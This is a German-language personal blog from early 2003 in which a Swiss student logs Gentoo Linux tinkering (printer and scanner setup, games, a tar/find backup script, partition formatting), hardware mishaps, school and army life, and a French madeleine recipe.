20:21 | Linux | Permalink

Nochetwas Linux-Windows

Explore2fds ist ein Windows-Explorer ähnlicher Dateimanager für ext2/3 Partitionen für Windows oder so ;-)

Sehr nützlich!

19:52 | Linux | Permalink

Linux - Windows

Da ich ja momentan nur mit einer alten Windowsinstallation arbeiten kann, habe ich mich wieder einmal ein bisschen umgeschaut, was für Tools es gibt, damit sich Windows und Linux näher kommen.
Auf dieser Liste habe ich einige gefunden:

- Partition Image für Linux
- Ext2fsprogs wovon es auch für Windows eine Treiber gibt siehe auch hier
- Linux-NTFS Project
- 'Netzwerkumgebung' für Windows

19:47 | Linux | Permalink

27.02.2003

Gentoo Linux 1.4_rc3 Released

Gentoo 1.4_rc3 ist da!

16:26 | Linux | Permalink

26.02.2003

Ich hab mir wieder einmal Mühe gegeben

Wenn bei einer Option für einen Befehl '(DANGEROUS)' steht, sollte auch der liebenswerte und neugierige Herr Jaggi ein bisschen Vernunft erhaschen und zuerst denken, dann handeln, denn sonst kommt es so, dass er die Festplatte auf UDMA-5 stellt, was nicht funktionieren kann, und dann seine ganze $HOME-Partition (und auch noch ein paar andere) zerlöchert!

Natürlich liegt das letzte Backup (Ja, ich bin ein FEigling ;-) schon über 2 Wochen zurück und nützt auch nicht wirklich viel!

15:24 | Tech | Permalink

21.02.2003

sec ist zurück

da!

15:17 | Misc | Permalink

noch zu Zensur

E-Mail Abrufen etc. geht natürlich auch nicht, da die Domain mail.waterwave.ch laut Mozilla gar nicht existiert. und ein 'ping waterwave.ch' ergibt nur 'ping: unknown host waterwave.ch' :-(

Warum, Warum, WWAAARRUUUMM ???

02:57 | Networking | Permalink

Zensur?

Ich kann waterwave.ch und jegliche Domains die darauf umgeleitet werden von zu Hause aus nicht mehr erreichen! Auch andere Domains (sunflyer.ch, ubique.ch) kann ich nicht erreichen, resp. kann mein PC nicht finden!

Wenn ich jedoch mit einem 'Anonymisierer' (nonymouse.com) darauf zugreife, funktioniert alles problemlos (z.B. dieses Posting).

Kann mir bitte jemand (möglichst viele *g*) mitteilen, ob die genannten Domains auch bei anderen Leuten nicht erreichbar sind. Ich vermute nämlich, dass Solnet irgend einem richterlichen Befehl folgt und das Internet nur zensiert ausliefert! Frage mich nur, was die obgenannten Domains so böses angestellt haben, damit sie versteckt werden müssen...

02:40 | Networking | Permalink

20.02.2003

Armee

So siehts aus:
Auszug ausm Dienstbüchlein

11:05 | Misc | Permalink

18.02.2003

Rekrutierung

Nun schreibe ich mit einer voll scheisse Steinzeit-Tastatur. Und die Internetzeit läuft gleich ab. Hab gerade 2 Psychotests in Rekordzeit absolviert ;-)

17:58 | Misc | Permalink

16.02.2003

Netzteil-Tweaking ?

Nachdem ich letzte Woche infolge angehäufer Proben, kaum Zeit hatte, den Computer einzuschalten, hat er sich gestern gerächt!

Mein Netzteil het nun irgendein Problem mit dem Temperatursensor. Kaum habe ich den Computer eingeschaltet und Linux gestartet, so beginnt der temperaturgesteuerte Netzteillüfter auf höchster Drehzahl zu laufen, was einen SEHR lauten Lärm verursacht!

Ich hab mich mal ein bisschen umgeschaut und diesen Review gefunden, indem auch der Temperatursensor thematisiert wird. In den Kommentaren wird gesagt, dass man problemlos einen Widerstand einbauen kann, der die Empfindlichkeit des Sensors dämpft.

Nun brauche ich noch nen Widerstand mit 1.5 Watt / 68 Ohm. Da ich sowieso nächste Woche noch Elektrizitätslehre repetieren muss, wird das wohl ne schöne praxisnahe Übung ;-)

Und Falls ich nächste Woche hier nichts mehr schreibe, so hab ich entweder falsch rumgebastelt, oder die von der Armee haben mich bei der Aushebung irgendwie malträtiert ;-)

11:24 | Tech | Permalink

09.02.2003

Yeehaw!

Altersbeschränkung von UT2003

Dies ist die aufs UT2003 aufgedruckte Altersbeschränkung, aber um die gehts in diesem Eintrag gar nicht, denn um diese Alterbeschränkung hier zeigen zu können, musste ich sie zuerst scannen und darum gehts.
Beim rumsurfen bin ich auf dieses Tutorial von Pro-Linux.de gestossen. Da ich einen HP PSC 950 Drucker, Scanner, Fax, Kopierer, Media-Card-Reader besitze, und ich zuerst annahm, dass der garnicht mit Linux zusammenarbeitet, war ich schon sehr glücklich, als ich den Drucker zum Laufen brachte. Von dem Tutorial angeregt, hab ich mich nocheinmal dahintergesetzt und nach langem und sehr intensivem Basteln (Drucker in CUPS entfernen, CUPS stoppen, HPOJS installieren, PPD File neu generieren, HPOJS Starten, HPOJS Konfigurieren, CUPS Starten, Drucker in CUPS wieder einrichten, schauen ob was erkennt wird, Scanner ja, Drucker nein (??), nocheinmal (und noch viele male mehr) alles von vorne ... ) geschafft, dass ich nun auch unter Linux Scannen kann, den Beweis seht ihr ja.
So, mal schauen ob wir den eingebauten Media-Card-Reader auch noch zum Leben erwecken können ...

01:36 | Linux | Permalink

08.02.2003

Das fehlt thinkgeek.com

Will fix your Computer for sex

Gefunden bei Kasia.

20:19 | Misc | Permalink

07.02.2003

GSM-Handys schädigen Nervenzellen

Ich habs ja schon immer gesagt. Selber schauen.

16:45 | Misc | Permalink

06.02.2003

zeugs

rw hat wiedereinmal ein paar nützliche tutorials aufgestöbert/geschrieben:
- Better Ad Blocking for Mozilla and Netscape 7
- RPM- und TGZ-Paket erzeugen mit Checkinstall
- GnuPG - Quick 'n' dirty

18:51 | Linux | Permalink

03.02.2003

*gähn*

so jetzt ist 2:22:22 und ich geh jetzt schlafen ;-)

02:22 | Misc | Permalink

Wein

Mit Wine kann man so lustige Sachen wie diese machen.
So, noch ein bisschen basteln, vielleicht krieg ich ja Fireworks so zum laufen :-)

01:24 | Linux | Permalink

02.02.2003

Zuerst das Vergnügen dann nix mehr ;-)

Nebst UT und UT2003 läuft jetzt auch Quake3A :-)

01:11 | Linux | Permalink

01.02.2003

Backup, besser

Leider kommt das gepostete Script nicht mit Ordnernamen, die mit Spaces vermurkst sind (ja genau, von Windows), zurecht. Wenn man nun zuerst die Ergebnisse von find ... in eine Datei speichert (mit -fprint Datei) und diese dann dem tar ... übergibt (mit --files-from=Datei) funktionierts! Evtl. muss man noch mittels --exclude=Datei diese Hilfsdatei vorm tar verstecken ;-)

16:10 | Linux | Permalink

Backup

Ich hab mich mal ein bisschen mit inkrementellem Backup beschäftigt. Rausgekommen ist das hier, vielleicht kanns ja sonst noch jemand gebrauchen.
today=`date +%d%b%Y`
backup_path=/backup
tar -cvf $backup_path/backup_$today.tar `find /home /www /root -newer $backup_path ! -name *~ ! -type d -print` > $backup_path/backup_$today.toc
Dieses Shellscript macht ein tar-file mit den Dateien aus /home, /www und /root, die seit dem letzten Backup verändert wurden und legt dieses unter /backup ab inklusive einer Inhaltsangabe :-)

03:05 | Linux | Permalink

31.01.2003

Die Aussicht geniessen

Screenshot aus UT2003 - Klick für grösserScreenshot aus UT2003 - Klick für grösser

03:25 | Misc | Permalink

29.01.2003

UT-ig

Jetzt läuft nebst UT auch UT2003 mit Gentoo :-)
Screenshots und Framerates gibts (noch) nicht ;-P

15:36 | Linux | Permalink

27.01.2003

Laaaaaaaaaaaag !!!

würde es an einer LAN heissen.
Das Internet lahmt momentan teilweise wie Sau und es liegt vermutlich daran, da ich nicht wie andere mit T-Dings ins Netz gehe *hehe*

22:05 | Networking | Permalink

Hammer

Ich glaub ich werd mir den Hammer kaufen *g*

21:45 | Tech | Permalink

Still alive

So, nach dem Begiessen des Notenschlusses (22.1.) und anderen Feierlichkeiten, machten wir heute eine Betreibsbesichtigung bei der Firma Moog, welche laut Michael S. (dessen Grossvater dat die Firma gegründet) die besten Hochdruckreiniger der Welt herstellt.

21:44 | Misc | Permalink

21.01.2003

waimea

Gerade bei mk entdeckt: waimea, ein WindowManager, der mich vor allem mit dem schönen Standard-Hintergrund überrascht hat *g*
Er soll auch mit BlackBox-Styles umgehen können und mit Transparenz noch mehr...

Screenshot

20:30 | Linux | Permalink

Tunning

mk macht auf seinen Seiten nun eine Sammlung von Tutorials zu Linux und X11. Aber nicht 'normale' Tutorials sondern eher Tunning-Tutorials :-)

00:26 | Linux | Permalink

Spinnerei

Wer Spass haben will kann unter Linux mal folgendes ausprobieren:
su
root-passwort
cat /dev/mouse > /dev/Pfad zum Drucker

00:23 | Linux | Permalink

20.01.2003

Alimentarium

Dimanche on était à Vevey dans l'Alimentarium. C'est une musée très intéressant et très recommandable!

On y pouvait faire des Madeleines avec cette recette:

Madeleines à l'huile d'olive
Selon une recette espagnole

Pour 9 à 12 moules

1 oeuf
110 g sucre
85 g huile d'olive
150 g farine
1/2 c. à café poudre à lever
75 ml de lait
1 pincée sel

Mélanger le sucre, l'oeuf, le sel.
Mélanger la poudre à lever avec la farine.
Incorporer alternativement le mélange poudre à lever-farine, l'huile, le lait.

Si on préfère une texture fine, ne pas trop battre la pâte.
Au contraire, pour qu'elle forme une belle boule sur le dessus, travailler la pâte au moins 5 min au batteur électrique.

Graisser les moules au pinceau avec un peu d'huile.
Remplir les moules aux trois quarts.

Cuisson: env. 15 min à 180°C

20:32 | Food | Permalink

18.01.2003

Zeitvertrieb

So. Am Donnerstag war ich am Infotag der Uni Bern. Dieser war jedoch nicht so überzeugend wie der der ETH Zürich. So langsam bekomme ich das Gefühl, dass dieses Studieren doch nix für mich ist.

Am Abend dann noch in Bern Lord of the Rings II angeschaut, zum zweiten Mal, aber auf Englisch, was definitiv besser ist.

Nach einer kurzen Nacht dann am Freitag in der Schule so richtig ausgehängt :-)

Als ich nach dem Befeiern des 9. Tages Schule im neuen Jahr endlich nach Hause gefunden hatte und den Computer startete, ertönte ein mir unbekanntes Geräusch. Es klang, als würde ein Lüfter irgendwie falsch drehen, d.h. irgend eine anderes Teil abreiben. Ich lokaliseirte das Problem vermutlich beim Netzteil. Also schnell den Computer ausgeschaltet, Netzteil ausgebaut. Vorsichtig das Netzteil augeschraubt und dort die Lüfter ausgebaut (Ja, ich lebe noch ;-), mit dem Staubsauger ein bisschen den Dreck weggemacht, etwas an den Lüfter rumgedrückt, wieder alles zusammengebaut und den Computer eingeschaltet. Et voilà, der Computer läuft wieder mit der mir bekannten Dezibellzahl ;-)

14:39 | Misc | Permalink

13.01.2003

mmm

unter milko music machine kann man mal so richtig die puppen tanzen lassen *g*

ja, ich weiss schon, sind kühe, aber puppen passte besser in den satz ;-)

20:53 | Misc | Permalink

MPlayer

Nein, nicht MPlayer wie mplayer.exe !!!

Sondern MPlayer. Wie vielerorts gesagt, kann auch ich mich daran anschliessen: geiles Tool ;-)

MPlayer mit aalib (daher die vielen Buchstaben ;-) : Screenshot

20:13 | Linux | Permalink

12.01.2003

Welcome to Danemark!

Via pzy einen Link gefunden, welcher evtl. bei einigen Personen unserer Klasse, die Lust auf die Maturreise nach Dänemark steigert ;-)

05:36 | Misc | Permalink

11.01.2003

The Hacker FAQ

The Hacker FAQ, gefunden bei kasia.

Und nein, es ist nicht das was ihr denkt ;-)

22:58 | Misc | Permalink

Es druckt!

Mit Hilfe von diesem Tutorial habe ich nun mein Gentoo so eingerichtet, dass es mit meinem HP PSC 950 zusammen drucken kann.

22:41 | Linux | Permalink

*schnarch*

So, heute mal wieder bis 16:30 Uhr geschlafen ...

21:07 | Misc | Permalink

09.01.2003

humelela

Ce mot correspond à "regarde vers l'avant".
Aujourd'hui en histoire bilingue il y avait un exposé contenant un chanson de l'Afrique de sud qui traite l'inégalité des femmes en Afrique, je pense que son title était ceci:

mamani humelela

qui veut dire: maman, regarde vers l'avant.

22:18 | Misc | Permalink

08.01.2003

Schnell

Jetz hab ich doch erst vorhin das ganze System aktualisiert, inklusive PHP (von 4.2.3 auf 4.3.0-r1). Und nun schaue ich wieder und es sind schon wieder fast 10 Updates verfügbar (z.B. PHP 4.3.0-r2). Manchmal ist mir Gentoo doch ein bisschen zu schnell ;-)

22:22 | Linux | Permalink

Rundumerneuern

Auf diesem Screenshot sieht man wie mittels
emerge -u world
die installierten Programme aktualisiert werden.

Das Theme für fluxbox nennt sich SLdr und stammt von mk. Den Hintergrund kann man hier finden.

16:48 | Linux | Permalink

Am Umsteigen

Ich hab grad 'E: (Games)' plattgemacht und mit
mke2fs -j /dev/hda6
und diesem Eintrag in /etc/fstab
/dev/hda6 /usr/local/games ext3 noatime,user 0 0
wiederbelebt ;-)

16:29 | Linux | Permalink

07.01.2003

Eisig

Als ich heute Morgen um 10 vor 6 frischgeduscht zum Bahnhof rannte, musste ich feststellen, dass meine noch nicht ganz getrockneten Haare gefrohren waren!

16:57 | Misc | Permalink

06.01.2003

LingoFox (r)

Michael hat eine evtl. sehr hilfreiche Website gefunden: Verben konjugieren mit LingoFox dem Konjugator

Leider darf man während den Franz.-Proben nicht ins Internet *g*

22:23 | School | Permalink

Schlaf?

Heute hab ich von etwa 01:30 bis 16 Uhr geschlafen, 15.5 Stunden! Das ist neuer Rekord! ;-)

00:27 | Misc | Permalink

01.01.2003

Es ist wieder soweit

Mein Gentoo ist wieder einmal neu kompiliert. Diesmal hab ich mir die Zeit genomen und dieses Tutorial über XFree86 ganz durchgelesen. Daher weiss ich nun, wie man den Windowmanager einstellt. Vermutlich kommt es auch daher, dass ich GNOME noch nie gestartet habe sondern die ganze Zeit mit Fluxbox arbeitet ;-)

Einen Screenshot gibt's natürlich auch.

13:43 | Linux | Permalink